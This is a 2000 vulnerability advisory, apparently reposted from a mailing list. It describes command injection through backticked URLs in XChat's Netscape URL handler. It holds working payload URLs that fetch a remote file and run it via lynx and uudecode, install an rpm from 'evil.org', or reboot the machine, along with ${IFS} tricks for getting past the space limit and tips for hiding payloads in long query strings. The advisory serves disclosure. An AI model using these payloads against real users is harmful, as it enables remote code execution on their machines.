XChat URL handler vulnerability

2000-08-18 00:00:00
vulners.com

Email was sent to [email protected] (the author of xchat) and after over a week,
I have received no reply. So here it is… the advisory.



zen-parse - blinking since 1992 (or mebe earlier)


X X CC H H AA TTTTT
X X C C H H A A T
X C HHHH AAAA T
X X C C H H A A T
X X CC H H A A T

Hole: backticked commands embedded in URLs vulnerability.


* If you are lazy, read this part *

Just to show what I mean about the possible danger, start Netscape and enter
in xchat (in a channel or query window) the following URL.

http://this.should.work.com/cgi-bin/search.cgi?q='`lynx${IFS}-dump${IFS}http://homepages.ihug.co.nz/~Sneuro/thing|uudecode;./thingee`'

Right click on it, and select the Netscape (Existing) or Netscape (New Window)
option.

Wait until the URL loads.
In a shell on your machine type

tail -2 ~/.bash_profile

echo You've been hax0red
echo --zen

(oops… should've been You\'ve been hax0red, but u get the idea ;])
Lucky it wasn't a script that was well written, and designed to
use script kiddie stuff to hack root or something, eh?



For the non-lazy and the lazy who were impressed by the quick demo…

<advisory>


X-Chat has a feature which allows execution of code remotely
with the permissions of the user running it. (affects at least
versions <1.4.2, probably all versions.)


The hole is in the URL Handler section:
Netscape (Existing)
causes XChat to run the command
netscape -remote 'openURL(%s)'
where the %s is replaced by the selected URL
eg: http://homepages.ihug.co.nz/~Sneuro/
causes the command
netscape -remote 'openURL(http://homepages.ihug.co.nz/~Sneuro/)'
which opens that page.
Netscape (Run New)
causes XChat to run the command
netscape %s
and so on.


* The Hole *

Backticking and shell expansion. Imagine if someone types:

l00k @ d15 k3w1 w@r3z 5173! http://www.altavista.com/?x=`date`y='`date`'

with the (Existing) or (New Window) options and others that
use 'openURL(%s)' type commands to start the program, you get:

netscape -remote 'openURL(http://www.altavista.com/?x=`date`y='`date`')'

Count the single quotes and you will see that at the 2nd date they are closed
and then reopened, so that date isn't inside the quotes anymore, leaving it
free to run, which it does.

With the (Run New) type commands (that is command %s with no 's around
the %s) you get:

netscape http://www.altavista.com/?x=`date`y='`date`'

which has the 1st date unescaped (no 's around it) and so it executes.

In real life though, it's unlikely anyone would click on a URL like

http://`reboot`/'`reboot`'

though. Still, not all that useful, I hear you tell me. Well, URLs can get
pretty long. For example, a cgi-bin call to something can get quite long.

http://www.altavista.com/cgi-bin/query?pg=q&stype=stext&Translate=on&sc=on&q=%2bxchat+%2bbacktick+%2bexploit&stq=10

compare that to:

http://www.altavista.com/cgi-bin/query?pg=q&stype=stext&Translate=on&sc=on&q=%2bxchat+%2b`reboot`+%2bexploit&stq=10&filter='`reboot`'&user=b0dee0132&split=1

quick glance… nothing wrong with it.

Well, you seem to have a limitation, in that putting spaces in doesn't
work, nor does redirection.

Well, you can put spaces in. The $IFS variable is probably set.
And who needs redirection, when you can do this:

http://www.altavista.com/?'"`rpm${IFS}-i${IFS}http://evil.org/evil.rpm`"'

(For (Existing) or (New Window))

http://www.altavista.com/?"`rpm${IFS}-i${IFS}http://evil.org/evil.rpm`"

(for (Run New))
(not hidden in any way, but it could be obfuscated like the earlier example.)
(Also only works if someone is running as root, (which is a STUPID idea
anyway) but the 1st example should've shown you a method around this)

anyway… the possibilities are endless ;)

– zen-parse
</advisory>

ps:
greets to:
lamagra, omega, lockdown, grue, Mega, possem,
some other people i can't remember, the rest of #roothat,
and mebe even #social and umm… u, if I know u.
